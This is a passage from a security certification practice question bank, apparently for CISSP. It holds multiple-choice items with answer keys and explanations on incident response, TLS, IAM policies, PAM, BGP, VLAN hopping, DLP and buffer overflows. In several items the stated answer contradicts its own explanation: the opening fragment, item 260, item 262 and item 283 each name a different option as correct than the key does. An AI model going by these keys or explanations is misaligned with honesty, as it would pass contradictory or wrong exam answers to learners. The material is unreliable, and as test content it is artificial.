D.The network administrator used a shared service account not unique to the PAM system.
AnswerA

Local accounts bypass PAM entirely, allowing unauthorized changes without being logged.

Why this answer

Option D is correct. A local account not managed by PAM would allow direct login without going through the PAM solution, thus bypassing logging and credential management. Option A is less likely because database corruption would cause widespread issues, not a single incident.

Option B is plausible but if the shared account was also managed by PAM, it would still be logged; if not, it is effectively a local account issue. Option C is possible but less likely because it would require modifying the RADIUS configuration without detection.

256
MCQeasy

According to NIST SP 800-61, which phase of incident response immediately follows detection and analysis?

A.Recovery
B.Preparation
C.Eradication
D.Containment
AnswerD

Containment immediately follows detection.

Why this answer

According to NIST SP 800-61, the incident response lifecycle consists of four phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. The phase that immediately follows Detection & Analysis is Containment, because once an incident is detected and analyzed, the priority is to limit damage and prevent further spread before eradication and recovery can be safely performed.

Exam trap

The trap here is that candidates confuse the logical order of the NIST phases, often selecting Eradication because they think removing the threat is the immediate next step, but NIST explicitly places Containment before Eradication to ensure the incident is stabilized first.

How to eliminate wrong answers

Option A is wrong because Recovery occurs after Eradication, not immediately after Detection & Analysis; it involves restoring systems to normal operation. Option B is wrong because Preparation is the initial phase that occurs before any incident, not after detection. Option C is wrong because Eradication follows Containment in the NIST framework; you must first contain the threat to prevent further damage before removing malware or compromised accounts.

257
MCQhard

A network architect is designing a network to comply with PCI DSS requirements that cardholder data must be encrypted during transmission over open networks. Which protocol should be used for encrypting traffic between a point-of-sale (POS) terminal and the payment gateway?

A.TLS 1.0
B.TLS 1.2
C.SSH
D.SSL 3.0
AnswerB

TLS 1.2 is secure and widely accepted for payment transactions.

Why this answer

TLS 1.2 is the correct choice because it is a widely accepted, secure protocol for encrypting data in transit, and it meets PCI DSS requirements for strong cryptography. PCI DSS explicitly prohibits the use of SSL and early TLS versions (1.0) due to known vulnerabilities, and TLS 1.2 provides robust cipher suites and forward secrecy.

Exam trap

The trap here is that candidates may confuse TLS 1.0 with TLS 1.2, assuming all TLS versions are equally secure, but PCI DSS explicitly requires TLS 1.2 or higher, and TLS 1.0 is considered weak and non-compliant.

How to eliminate wrong answers

Option A is wrong because TLS 1.0 is deprecated by PCI DSS as of June 30, 2018, due to vulnerabilities such as BEAST and POODLE, and does not meet the requirement for strong encryption. Option C is wrong because SSH is primarily used for secure remote administration and file transfer, not for encrypting POS-to-gateway traffic, and it operates at a different layer (application) than the transport-layer encryption needed for payment protocols. Option D is wrong because SSL 3.0 is completely broken and prohibited by PCI DSS since June 30, 2015, due to the POODLE attack and lack of secure cipher suites.

258
MCQmedium

Refer to the exhibit. An organization attaches this IAM policy to a user. What is a key security limitation of this policy?

A.It only allows the GetObject action, limiting functionality
B.It does not specify a Principal, so access is denied for all
C.It allows all actions except s3:GetObject
D.It allows access from any IP within the 10.0.0.0/8 range, which is too broad
AnswerA

The policy grants only read access, which may be too restrictive for some use cases.

Why this answer

Option A is correct because the policy only grants the s3:GetObject action, which restricts the user to read-only access on S3 objects. This is a key security limitation as it prevents the user from performing other necessary operations like listing buckets (s3:ListBucket) or writing data, which can hinder operational workflows. The policy's narrow scope ensures least privilege but may be too restrictive for roles requiring broader S3 interactions.

Exam trap

ISC2 often tests the misconception that an IAM policy without a Principal is invalid or denies all access, but in identity-based policies, the Principal is implicit and not required.

How to eliminate wrong answers

Option B is wrong because IAM policies attached to a user do not require a Principal element; the Principal is implicitly the user to whom the policy is attached, so access is not denied for all. Option C is wrong because the policy explicitly allows s3:GetObject, not all actions except s3:GetObject; a Deny effect would be needed to block a specific action while allowing others. Option D is wrong because the policy does not include a condition key like aws:SourceIp to restrict access to the 10.0.0.0/8 range; without such a condition, the policy applies globally regardless of IP address.

259
Drag & Dropmedium

Drag and drop the steps for a secure password change procedure in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Password change: verify identity, enter new password, enforce history, hash storage, log.

260
MCQhard

A security analyst discovers that a service account in Active Directory has not had its password changed in 5 years and has domain admin privileges. The account is used by a legacy application that does not support modern authentication protocols. Which of the following is the MOST secure approach to manage this account?

A.Convert the account to a group Managed Service Account (gMSA)
B.Set a very long, complex password and store it in a password manager
C.Decommission the legacy application and migrate to a modern alternative that supports secure authentication
D.Disable the account and create a new service account with limited privileges
AnswerC

Eliminates the risk entirely by removing the service account.

Why this answer

Option D is correct because the best security is to decommission the account and modernize the application. Option A is wrong because group Managed Service Accounts (gMSAs) require Windows Server 2012 or later and application support. Option B is wrong because a long, complex password still has risk of theft and is not automatically rotated.

Option C is wrong because disabling the account would break the application.

261
MCQeasy

A system administrator is configuring an LDAP directory for user authentication. The policy requires that account lockout occurs after a specified number of failed attempts. Which attribute should be configured?

A.failedLoginAttempts
B.lockoutThreshold
C.lockoutDuration
D.passwordLockoutTime
AnswerB

This attribute defines the number of failed attempts before account lockout.

Why this answer

The `lockoutThreshold` attribute in an LDAP directory specifies the maximum number of consecutive failed authentication attempts allowed before the account is locked. This directly satisfies the policy requirement to lock the account after a specified number of failed attempts, making it the correct attribute to configure.

Exam trap

The trap here is that candidates confuse the attribute that sets the failure limit (`lockoutThreshold`) with the attribute that tracks current failures (`failedLoginAttempts`) or the attribute that sets the lockout duration (`lockoutDuration`), leading them to pick a wrong option that describes a related but distinct function.

How to eliminate wrong answers

Option A is wrong because `failedLoginAttempts` is typically an operational attribute that tracks the current count of failed attempts, not a configuration parameter that sets the threshold for lockout. Option C is wrong because `lockoutDuration` defines how long the account remains locked after the threshold is exceeded, not the number of failed attempts that trigger the lockout. Option D is wrong because `passwordLockoutTime` is not a standard LDAP attribute; it may be confused with a timestamp of when the lockout occurred, but it does not set the failure count limit.

262
MCQhard

Refer to the exhibit. A security auditor examines the Git history of a critical security patch. What is the most significant security concern?

A.The security fix was reverted, re-exposing the application to the authentication bypass vulnerability.
B.Developer A and Developer B are not following a formal commitment process.
C.The commit message of the revert does not explain why the vulnerability fix was removed.
D.The fix was authored by Developer B but reverted by Developer A without approval.
AnswerA

Reversing the fix reintroduces the vulnerability.

Why this answer

Option D is correct because a developer reverted a security fix, re-introducing the vulnerability. This is a serious regression. Option A is wrong while commitment discipline is informal, the bigger issue is the revert.

Option B is wrong because the timestamps show the revert happened after the fix. Option C is wrong because the commit message explicitly says it reverts the fix, so the intent is clear.

263
MCQhard

A company uses BGP to exchange routes with its ISP. To prevent prefix hijacking, which mechanism should be implemented?

A.BGP MD5 authentication
B.BGP community values
C.RPKI
D.AS-path filtering
AnswerC

Validates the origin AS of prefixes, mitigating hijacking.

Why this answer

RPKI (Resource Public Key Infrastructure) is the correct mechanism because it cryptographically validates the origin AS of a BGP route announcement, preventing prefix hijacking by ensuring that only the legitimate owner of an IP prefix can announce it. Unlike other options, RPKI provides a trust anchor based on the IP address allocation hierarchy, making it the only solution that directly addresses the root cause of hijacking—unauthorized origin AS claims.

Exam trap

ISC2 often tests BGP MD5 authentication as a security measure, but the trap here is confusing session-level authentication (MD5) with route-level validation (RPKI), leading candidates to choose A because they think 'authentication' covers route integrity, when it only protects the BGP session itself.

How to eliminate wrong answers

Option A is wrong because BGP MD5 authentication (RFC 2385) only secures the TCP session between BGP peers, preventing spoofed TCP resets or session hijacking, but does not validate the legitimacy of the route content itself, so it cannot stop a malicious AS from announcing a prefix it does not own. Option B is wrong because BGP community values are tags used for route policy and traffic engineering (e.g., prepending, local preference), but they are not authenticated or cryptographically bound to the origin AS, so they can be easily manipulated or ignored by an attacker. Option D is wrong because AS-path filtering relies on manually configured prefix lists or AS-path access lists to block routes based on AS-path patterns, which is static, error-prone, and cannot detect hijacks where the attacker uses a legitimate AS-path (e.g., via a compromised AS or by prepending a valid AS number).

264
MCQeasy

A network security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of TCP SYN packets to a single external IP address from a compromised internal host. This is characteristic of which type of attack?

A.SYN flood
B.Man-in-the-middle
C.ARP spoofing
D.DNS amplification
AnswerA

A SYN flood uses a high volume of TCP SYN packets to overwhelm the target's connection queue.

Why this answer

A SYN flood attack exploits the TCP three-way handshake by sending a high volume of SYN packets to a target, exhausting its connection table and preventing legitimate connections. The IDS alert specifically describes a compromised internal host generating many SYN packets to a single external IP, which matches the classic behavior of a SYN flood where the attacker spoofs the source IP or uses a bot to saturate the target's resources.

Exam trap

The trap here is that candidates confuse a SYN flood (which uses TCP SYN packets to exhaust resources) with a DNS amplification attack (which uses UDP and reflection), but the question's mention of 'TCP SYN packets' directly points to the SYN flood, not a volumetric reflection attack.

How to eliminate wrong answers

Option B is wrong because a man-in-the-middle attack involves intercepting and potentially altering communications between two parties, not generating a high volume of SYN packets to a single external IP. Option C is wrong because ARP spoofing operates at Layer 2 by associating an attacker's MAC address with a legitimate IP address on a local network, not by sending TCP SYN packets to an external IP. Option D is wrong because a DNS amplification attack uses small DNS queries with spoofed source IPs to generate large responses directed at a victim, relying on UDP and DNS servers, not TCP SYN packets from a compromised host.

265
MCQeasy

A company requires employees to authenticate using a smart card and PIN to access the corporate network. This is an example of which type of authentication?

A.Single-factor authentication
B.Biometric authentication
C.Two-factor authentication
D.Single sign-on
AnswerC

Correct – smart card (something you have) and PIN (something you know) are two distinct factors.

Why this answer

This scenario requires two distinct authentication factors: something you have (the smart card) and something you know (the PIN). Smart cards store a private key or certificate that must be unlocked by the PIN, and both factors must be presented simultaneously to authenticate. This meets the NIST SP 800-63 definition of multi-factor authentication, specifically two-factor authentication.

Exam trap

The trap here is that candidates may mistakenly think a smart card alone is a single factor, forgetting that the PIN is a separate knowledge factor, or they may confuse two-factor authentication with SSO because both can involve a single login event.

How to eliminate wrong answers

Option A is wrong because single-factor authentication uses only one factor (e.g., just a password or just a smart card), but here both a smart card and a PIN are required. Option B is wrong because biometric authentication relies on physical characteristics like fingerprints or iris patterns, not a smart card and PIN. Option D is wrong because single sign-on (SSO) allows a user to authenticate once and access multiple systems without re-entering credentials, but it does not define the number of factors used in that initial authentication.

266
Multi-Selectmedium

A company is conducting a security assessment of its network infrastructure. Which of the following activities are typically performed during a vulnerability assessment? (Select TWO.)

Select 2 answers
A.Identification of missing security patches
B.Attempting to crack password hashes
C.Social engineering attacks against employees
D.Exploiting identified vulnerabilities to gain unauthorized access
E.Automated scanning of open ports and services
AnswersA, E

Patch identification is a key component of vulnerability assessment.

Why this answer

A is correct because vulnerability assessments focus on identifying and cataloging weaknesses without exploitation. Missing security patches are a common finding from automated scanning tools like Nessus or OpenVAS, which compare system configurations against known vulnerability databases (e.g., CVE). This aligns with the assessment's goal of discovering vulnerabilities, not exploiting them.

Exam trap

The trap here is confusing vulnerability assessment (identification only) with penetration testing (identification plus exploitation), leading candidates to select 'Exploiting identified vulnerabilities to gain unauthorized access' as a correct activity.

267
MCQeasy

A system administrator notices that user accounts are often left active after employees leave the company. Which process should be automated to address this?

A.Single sign-on implementation
B.Password reset policy
C.Multi-factor authentication
D.Automated account provisioning and deprovisioning
AnswerD

This process ensures accounts are created and disabled in sync with HR records.

Why this answer

Automated provisioning and deprovisioning ensures accounts are disabled when employment ends. Password resets and SSO do not solve the issue of stale accounts. MFA adds security but does not remove accounts.

268
MCQmedium

During a forensic investigation, the team needs to preserve evidence from a running server. What is the FIRST step the team should take?

A.Capture a memory dump.
B.Create a disk image.
C.Shut down the server normally.
D.Unplug the network cable.
AnswerA

Preserves volatile evidence critical for analysis.

Why this answer

The first step in a forensic investigation of a running server is to capture a memory dump because volatile data (RAM) contains critical evidence such as running processes, network connections, encryption keys, and malware that would be lost if the system is powered off or altered. Preserving this volatile state before any other action ensures that the most transient evidence is secured, following the order of volatility principle. Capturing memory first prevents irreversible loss of data that cannot be recovered from disk or network captures.

Exam trap

The trap here is that candidates often confuse the urgency of preserving volatile data with the desire to immediately isolate the system from the network, leading them to choose unplugging the network cable first, but the correct forensic priority is to capture the most volatile evidence (memory) before any network or power actions.

How to eliminate wrong answers

Option B is wrong because creating a disk image is a non-volatile data acquisition step that should occur after capturing memory, as disk imaging does not preserve volatile evidence like running processes or encryption keys. Option C is wrong because shutting down the server normally would cause the operating system to cleanly terminate processes, potentially destroying evidence such as temporary files, network connections, and memory-resident malware, and may trigger anti-forensic mechanisms. Option D is wrong because unplugging the network cable, while it may prevent remote tampering, is not the first step; it should be performed after memory capture to avoid disrupting network-based evidence (e.g., active connections, network traffic logs) that could be captured from memory first.

269
Drag & Dropmedium

Drag and drop the steps for conducting a business impact analysis (BIA) in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

BIA starts with identifying critical functions, then determining their MTD, identifying dependencies, assessing impacts, and finally documenting priorities.

270
MCQmedium

A company uses smart cards for authentication to workstations. A user inserts their smart card but is prompted for a PIN. The user enters the correct PIN but authentication fails. The smart card is not expired. What is the most likely cause?

A.The user's certificate is revoked
B.The PIN is incorrectly stored on the card
C.The smart card driver is outdated
D.The workstation's clock is off by more than 5 minutes
AnswerA

Revoked certificate causes authentication failure despite correct PIN.

Why this answer

When a smart card is used for authentication, the PIN unlocks the private key stored on the card, but the actual authentication typically relies on a certificate chain and the validity of the user's certificate. If the certificate has been revoked (e.g., due to compromise or termination), the Certificate Revocation List (CRL) or Online Certificate Status Protocol (OCSP) check will fail, causing authentication to be denied even though the PIN is correct and the card is not expired.

Exam trap

The trap here is that candidates assume PIN entry failure is the only smart card authentication issue, but the PIN only unlocks the private key; the certificate's revocation status is a separate, often overlooked, layer that can cause authentication to fail after correct PIN entry.

How to eliminate wrong answers

Option B is wrong because the PIN is not stored on the card; the PIN is a user-entered secret used to unlock the card's private key, and if the PIN were incorrectly stored, the card would reject the PIN entry itself, not allow entry and then fail authentication. Option C is wrong because an outdated smart card driver would typically cause the card reader to not be recognized or the card to not be read at all, not allow PIN entry and then fail authentication. Option D is wrong because a workstation clock skew of more than 5 minutes could cause certificate validity period checks to fail, but this would affect the certificate's 'not before' or 'not after' dates, not revocation status; revocation is checked via CRL/OCSP independently of system time.

271
MCQmedium

A multinational corporation maintains site-to-site IPsec VPN tunnels between its headquarters and three regional branch offices. Over the past week, the tunnels have been dropping intermittently, causing disruption to real-time applications. The network team checked logs and found frequent 'Phase 2 rekey failure' messages. The tunnels are configured with IKEv1 and preshared keys. The headquarters uses a Cisco ASA, and the branches use various vendors' firewalls. The team verified that firewall policies allow IPsec traffic, and there is no packet loss on the WAN links. Which action should the team take to resolve the issue most effectively?

A.Increase the MTU on the WAN interfaces to 1500 bytes on all firewalls.
B.Change the encryption algorithm from AES-256 to 3DES on all peers.
C.Migrate all VPN connections from IPsec to SSL VPN using clientless access.
D.Adjust the Dead Peer Detection (DPD) intervals and Phase 2 lifetime settings to be consistent across all sites.
AnswerD

Consistent DPD timers and lifetimes prevent premature rekey attempts or missed rekeys, stabilizing the tunnels.

Why this answer

The frequent 'Phase 2 rekey failure' messages indicate a mismatch in IPsec security association (SA) parameters between the Cisco ASA and the branch firewalls. IKEv1 Phase 2 lifetimes and Dead Peer Detection (DPD) intervals must be consistent across all peers; otherwise, one side may attempt to rekey or declare the peer dead while the other expects a different timing, causing intermittent tunnel drops. Adjusting these values to match across all sites resolves the rekey failures without compromising security or requiring a protocol migration.

Exam trap

ISC2 often tests the misconception that rekey failures are caused by encryption algorithm mismatches or MTU issues, but the real cause is almost always inconsistent Phase 2 lifetimes or DPD intervals when using IKEv1 with multiple vendor firewalls.

How to eliminate wrong answers

Option A is wrong because increasing MTU to 1500 bytes is the default for Ethernet and does not address Phase 2 rekey failures; MTU issues typically cause fragmentation or packet loss, not rekey mismatches. Option B is wrong because changing from AES-256 to 3DES weakens encryption and does not fix rekey failures; the problem is timing/parameter consistency, not cipher strength. Option C is wrong because migrating to SSL VPN with clientless access is a completely different architecture that would not resolve IPsec Phase 2 rekey failures and would introduce new complexity; the issue is specific to IKEv1 Phase 2 lifetime mismatches, not the VPN protocol type.

272
MCQeasy

During a security audit, an organization discovers that several employees are sharing a single generic account to access a critical database. Which principle of security operations is being violated?

A.Accountability
B.Separation of duties
C.Defense in depth
D.Least privilege
AnswerA

Account sharing removes the ability to trace actions to an individual, violating accountability.

Why this answer

Accountability requires that each individual user be uniquely identified and their actions traceable. Sharing a generic account breaks this chain because the audit logs cannot attribute specific database operations (e.g., SELECT, UPDATE, DELETE) to a particular employee, making it impossible to hold anyone responsible for misuse or errors.

Exam trap

The trap here is that candidates confuse the lack of individual accountability with the principle of least privilege, assuming that sharing a generic account automatically means excessive permissions, when the real violation is the inability to uniquely identify and trace user actions.

How to eliminate wrong answers

Option B is wrong because separation of duty involves splitting critical tasks among multiple people to prevent fraud (e.g., requiring two different users to authorize and execute a transaction), which is not directly violated by shared accounts. Option C is wrong because defense in depth is a layered security strategy (e.g., firewalls, IDS, encryption) that remains intact even if a single account is shared; the violation here is about identity and audit, not defense layers. Option D is wrong because least privilege restricts users to the minimum permissions needed for their role; while shared accounts may also have excessive privileges, the core violation in this scenario is the inability to attribute actions to individuals, not the level of access rights.

273
MCQmedium

Refer to the exhibit. What is the purpose of the NAT configuration on R1?

A.To translate internal private addresses to the IP address of the FastEthernet0/0 interface.
B.To translate internal private addresses to a pool of public addresses.
C.To translate internal private addresses to a static public address.
D.To translate internal private addresses to the IP address of the Serial0/0 interface using PAT.
AnswerD

Correct. The 'overload' keyword enables PAT, and the interface IP is used as the translated address.

Why this answer

The configuration uses dynamic NAT with PAT (overload). It translates source addresses from the inside network (192.168.1.0/24) to the IP address of the Serial0/0 interface (the outside interface). This allows multiple internal hosts to share the single public IP address.

274
Multi-Selecteasy

A network administrator is configuring switches to prevent VLAN hopping attacks. Which TWO of the following measures should be implemented?

Select 2 answers
A.Use private VLANs on all trunk ports.
B.Set the native VLAN to an unused VLAN.
C.Enable BPDU guard on all access ports.
D.Disable Dynamic Trunking Protocol (DTP) on trunk ports.
E.Implement port security on all access ports.
AnswersB, D

This prevents double-tagging attacks by ensuring the native VLAN is not used by any user traffic.

Why this answer

Setting the native VLAN to an unused VLAN prevents VLAN hopping via double-tagging attacks. In a double-tagging attack, an attacker sends frames with two 802.1Q tags; the first tag is stripped by the trunk's native VLAN, and the second tag allows the frame to hop to a different VLAN. By using an unused VLAN as the native VLAN, there are no hosts on that VLAN to receive or exploit the double-tagged traffic.

Exam trap

ISC2 often tests the distinction between access port security features (like BPDU guard and port security) and trunk-specific controls (like DTP disablement and native VLAN configuration), leading candidates to mistakenly select access port protections for a trunk-based attack.

275
MCQhard

An organization uses a federated identity model with multiple external partners. The identity provider (IdP) notices that some partners are sending outdated SAML assertions. What is the best way to mitigate this issue?

A.Require partners to include a timestamp in the assertion.
B.Increase the NotBefore and NotOnOrAfter time window.
C.Configure the IdP to reject assertions with a stale timestamp using the Conditions element.
D.Implement short-lived assertions and require re-authentication.
AnswerC

This enforces assertion freshness and mitigates replay attacks.

Why this answer

Option C is correct because the SAML Conditions element explicitly defines the validity window for an assertion using NotBefore and NotOnOrAfter attributes. By configuring the IdP to validate these timestamps and reject assertions that fall outside the window, the organization directly enforces assertion freshness without relying on partner-side changes or weakening security.

Exam trap

The trap here is that candidates confuse 'requiring a timestamp' (which is already present) with 'validating the timestamp' (which is the actual control), or they mistakenly think widening the time window is a mitigation when it actually increases risk.

How to eliminate wrong answers

Option A is wrong because SAML assertions already include a timestamp (IssueInstant) and the Conditions element; merely requiring a timestamp does not enforce rejection of stale assertions. Option B is wrong because increasing the NotBefore and NotOnOrAfter time window would actually make the system more permissive to stale assertions, not mitigate the issue. Option D is wrong because implementing short-lived assertions and requiring re-authentication shifts the burden to partners and may cause usability issues; it does not directly address the IdP's ability to reject already-outdated assertions from non-compliant partners.

276
Multi-Selecthard

Which THREE of the following are key considerations when implementing a data retention policy for an organization subject to multiple legal jurisdictions?

Select 3 answers
A.Varying statutory retention periods across jurisdictions
B.Potential litigation holds that require preserving data beyond normal retention
C.The cost of maintaining long-term storage for large volumes of data
D.The organization's ability to delete data after the minimum retention period
E.The data owner's personal preference for deletion timelines
AnswersA, B, C

Different countries have different laws, must comply with the longest.

Why this answer

Option A is correct because different legal jurisdictions impose distinct statutory retention periods for various data types (e.g., GDPR requires retention no longer than necessary, while HIPAA mandates 6 years for medical records). A data retention policy must account for these varying minimums to ensure compliance across all applicable laws. Failing to reconcile conflicting periods can lead to legal penalties or data deletion before a jurisdiction’s requirement is met.

Exam trap

The trap here is that candidates often confuse operational convenience (like cost of storage) with a core legal consideration, or they mistakenly think a data owner’s preference is a valid input for a compliance-driven policy, when in fact only statutory and regulatory requirements are primary.

277
MCQeasy

A small business wants to implement a risk management framework. Which approach is best for identifying risks?

A.Quantitative analysis
B.Penetration testing
C.Threat modeling
D.Qualitative analysis
AnswerD

Uses relative rankings and is practical for organizations with limited data.

Why this answer

Qualitative analysis is cost-effective and does not require precise data, making it suitable for small businesses. Quantitative analysis is resource-intensive. Threat modeling is specific to certain scenarios.

Penetration testing is a validation technique, not a broad risk identification method.

278
MCQhard

An organization implements a data loss prevention (DLP) solution to monitor data in motion. Which type of data is typically most challenging to detect?

A.Data in images
B.Structured data in CSV files
C.Encrypted traffic
D.Unstructured data in email attachments
AnswerC

Encryption hides content, requiring decryption or metadata analysis.

Why this answer

Encrypted traffic is the most challenging data in motion for DLP to inspect because the payload is obfuscated by encryption protocols such as TLS 1.3 or IPsec. Without decryption (e.g., via a proxy with TLS interception), the DLP sensor cannot read the content to match patterns or keywords, rendering traditional deep packet inspection ineffective.

Exam trap

The trap here is that candidates assume 'data in images' is hardest because it is non-textual, but DLP can use OCR and image analysis, whereas encrypted traffic is fundamentally opaque without decryption keys.

How to eliminate wrong answers

Option A is wrong because data in images can be detected via optical character recognition (OCR) or steganography analysis, though it is harder than plaintext, it is still inspectable. Option B is wrong because structured data in CSV files has predictable delimiters and patterns (e.g., credit card numbers, SSNs) that DLP regex rules can reliably match. Option D is wrong because unstructured data in email attachments, while varied, is still in plaintext or common binary formats (e.g., PDF, DOCX) that DLP can parse and scan for sensitive content.

279
MCQeasy

A company deploys a web application that uses TLS to protect data in transit. The security team discovers that the server supports TLS 1.0 and uses a 1024-bit RSA certificate. What is the most significant security concern?

A.The certificate uses RSA 1024-bit key
B.The server supports TLS 1.0
C.The server does not support HTTP/2
D.The server enables TLS session tickets
AnswerB

TLS 1.0 is deprecated and has known vulnerabilities.

Why this answer

TLS 1.0 is a deprecated protocol with known vulnerabilities, including susceptibility to BEAST and POODLE attacks, which can allow an attacker to decrypt intercepted traffic. While a 1024-bit RSA key is weak, the most immediate and significant risk is the use of an outdated protocol that is actively exploited in the field. Disabling TLS 1.0 and enforcing TLS 1.2 or higher is the critical first step to secure data in transit.

Exam trap

The trap here is that candidates often focus on the weak key length (1024-bit RSA) as the most significant issue, but CISSP emphasizes that using a deprecated protocol (TLS 1.0) with known active exploits is a more urgent and severe security concern than a key that may take significant resources to break.

How to eliminate wrong answers

Option A is wrong because while a 1024-bit RSA key is considered weak and can be factored with sufficient resources, the immediate and most significant security concern is the use of TLS 1.0, which has known, practical attacks that can be executed today. Option C is wrong because HTTP/2 is a performance enhancement, not a security requirement; its absence does not introduce a direct vulnerability to data in transit. Option D is wrong because TLS session tickets, while having some security considerations (e.g., forward secrecy if not implemented correctly), are not as critical as the use of a deprecated protocol like TLS 1.0, which is actively targeted by attackers.

280
Multi-Selecthard

Which THREE of the following are valid countermeasures against buffer overflow attacks?

Select 3 answers
A.Stack canaries
B.Full disk encryption
C.Address space layout randomization (ASLR)
D.Non-executable stack and heap (NX bit)
E.Input validation using allowlists
AnswersA, C, D

Detects buffer overflows on the stack.

Why this answer

Stack canaries are correct because they place a known value (canary) between the buffer and control data on the stack. Before a function returns, the canary is checked; if it has been overwritten (indicating a buffer overflow), the program terminates, preventing code execution. This directly detects stack-based buffer overflows before they can hijack the return address.

Exam trap

The trap here is that candidates often confuse general security controls (like input validation or encryption) with specific memory protection mechanisms, leading them to select options that are good practices but not direct countermeasures against buffer overflow attacks.

281
MCQhard

During a security audit of a financial application, the auditor discovers that the application uses a custom encryption algorithm for storing sensitive data. The developer claims it is more efficient than AES. What should the auditor recommend?

A.Conduct additional penetration testing on the encryption implementation
B.Accept the risk if the algorithm is more efficient
C.Perform a cryptoanalysis of the algorithm to validate its strength
D.Migrate to a widely-accepted encryption standard such as AES
AnswerD

Standard algorithms are extensively reviewed and trusted.

Why this answer

Custom encryption algorithms are highly risky because they have not undergone the extensive peer review and cryptanalysis that standards like AES have. Even if the developer claims better efficiency, the lack of proven security guarantees makes the application vulnerable to attacks. The correct recommendation is to migrate to a widely-accepted standard such as AES, which is FIPS 197 validated and trusted for protecting sensitive financial data.

Exam trap

The trap here is that candidates may think performing cryptanalysis (Option C) is a valid audit recommendation, but in practice, the auditor's role is to enforce the use of proven standards, not to validate unproven custom cryptography.

How to eliminate wrong answers

Option A is wrong because additional penetration testing on a custom encryption implementation cannot uncover fundamental cryptographic weaknesses; penetration testing is not a substitute for formal cryptanalysis or algorithm validation. Option B is wrong because accepting the risk based solely on efficiency claims violates the principle of using proven, standardized cryptography for sensitive data; efficiency does not equate to security. Option C is wrong because performing a cryptanalysis of the custom algorithm is not a practical recommendation for an auditor; it requires expert cryptographers and extensive time, and even then, the algorithm may still have undiscovered flaws, whereas migrating to a proven standard is the immediate and correct security control.

282
MCQeasy

In the context of physical security, which of the following is an example of a preventive control?

A.Security guards monitoring
B.CCTV cameras
C.Intrusion detection system
D.Mantrap door
AnswerD

Correct. A mantrap prevents tailgating and unauthorized access.

Why this answer

A mantrap door is a preventive physical security control because it actively prevents unauthorized entry by requiring authentication and verification before allowing passage through a series of interlocking doors. Unlike monitoring or detection systems, a mantrap physically blocks access until the user is validated, thereby stopping a breach before it occurs.

Exam trap

The trap here is confusing preventive controls (which stop an incident) with detective controls (which identify an incident after it occurs), leading candidates to incorrectly select CCTV or IDS as preventive measures.

How to eliminate wrong answers

Option A is wrong because security guards monitoring is a detective and deterrent control, not preventive; they observe and report incidents but do not physically block access. Option B is wrong because CCTV cameras are a detective control that records events for after-the-fact review, they do not prevent an intrusion from happening. Option C is wrong because an intrusion detection system (IDS) is a detective control that alerts on suspicious activity but does not actively block or prevent the intrusion.

283
MCQhard

An organization is implementing a privileged access management (PAM) solution for managing administrative credentials. Which of the following is the most critical control to prevent credential theft?

A.Enforcing periodic password changes
B.Just-in-time (JIT) privilege elevation
C.Encrypting stored passwords
D.Multi-factor authentication on admin accounts
E.Session recording and monitoring
AnswerB

JIT reduces standing privileges, limiting the impact of credential theft.

Why this answer

Option A is correct because just-in-time privilege elevation minimizes the window of exposure and reduces standing privileges, which is the most effective against credential theft. Option B is wrong because multi-factor authentication is important but does not prevent theft of cached credentials. Option C is wrong because password rotation is reactive.

Option D is wrong because session recording is detective. Option E is wrong because encryption protects at rest but does not prevent theft in use.

284
MCQmedium

A security analyst receives an alert that a host in the internal network is sending abnormal amounts of traffic to an external IP. The traffic uses destination port 53. What is the most likely attack?

A.DNS cache poisoning
B.DNS amplification
C.DNS tunneling
D.DNS zone transfer
AnswerC

DNS tunneling encapsulates data in DNS queries to exfiltrate information, causing abnormal traffic patterns.

Why this answer

The alert describes a host sending abnormal traffic to an external IP on destination port 53, which is the default port for DNS. DNS tunneling exploits the DNS protocol to encapsulate non-DNS data (e.g., commands or exfiltrated files) within DNS queries and responses, allowing covert communication through firewalls that typically allow DNS traffic. The abnormal volume of traffic to a single external IP is a classic indicator of a DNS tunnel, as the compromised host continuously sends encoded data to an external command-and-control server.

Exam trap

The trap here is that candidates confuse the use of port 53 with DNS amplification attacks, but amplification requires a victim IP and open resolvers, not a single internal host sending traffic to an external IP.

How to eliminate wrong answers

Option A is wrong because DNS cache poisoning (also known as DNS spoofing) involves injecting forged DNS records into a resolver's cache to redirect traffic, not generating abnormal outbound traffic from a single host. Option B is wrong because DNS amplification is a distributed denial-of-service (DDoS) attack that uses open resolvers to flood a victim with large responses, but the alert describes a single internal host sending traffic outbound, not a reflector sending amplified traffic to a victim. Option D is wrong because a DNS zone transfer is a legitimate mechanism for replicating DNS zone data between authoritative servers, typically using TCP port 53, and is not an attack that causes a single host to send abnormal traffic to an external IP.

285
MCQhard

A financial services firm recently deployed a multi-factor authentication (MFA) solution for remote access to its trading platform. The MFA requires a one-time password (OTP) via a mobile app, in addition to a username and password. Since deployment, remote traders have complained that the authentication process takes too long, especially during market open hours. The help desk reports that many traders are accidentally locking their accounts due to multiple failed OTP attempts. The security team wants to maintain strong security but improve user experience. Which action should the security team take?

A.Reduce MFA to two factors by removing the OTP requirement
B.Remove MFA requirements during peak hours to improve performance
C.Implement risk-based adaptive MFA that prompts only when anomalous activity is detected
D.Extend the OTP validity window to 10 minutes to reduce time pressure
AnswerC

Adaptive MFA balances security and user experience by requiring additional factors only when risk is elevated.

Why this answer

Option C is correct because risk-based adaptive MFA evaluates the context of each authentication request (e.g., location, device, time, behavior) and only triggers an OTP challenge when the risk score exceeds a threshold. This reduces friction for legitimate traders during peak hours while maintaining strong security against anomalous access attempts, directly addressing the complaint of slow authentication without weakening the overall security posture.

Exam trap

The trap here is that candidates may assume extending the OTP validity window (Option D) is a harmless usability fix, but CISSP tests the understanding that longer OTP windows increase the risk of replay attacks and violate the principle of short-lived credentials, whereas adaptive authentication is the correct balance of security and usability.

How to eliminate wrong answers

Option A is wrong because reducing MFA to two factors by removing the OTP requirement would weaken authentication to only username/password, violating the principle of defense-in-depth and exposing the trading platform to credential theft. Option B is wrong because removing MFA during peak hours creates a predictable window of vulnerability that attackers could exploit, directly contradicting the security team's goal to maintain strong security. Option D is wrong because extending the OTP validity window to 10 minutes increases the window of opportunity for replay attacks (e.g., if an OTP is intercepted or leaked) and does not address the root cause of user frustration—the frequency of unnecessary OTP prompts—while also violating NIST SP 800-63B recommendations for short-lived OTPs.

286
MCQhard

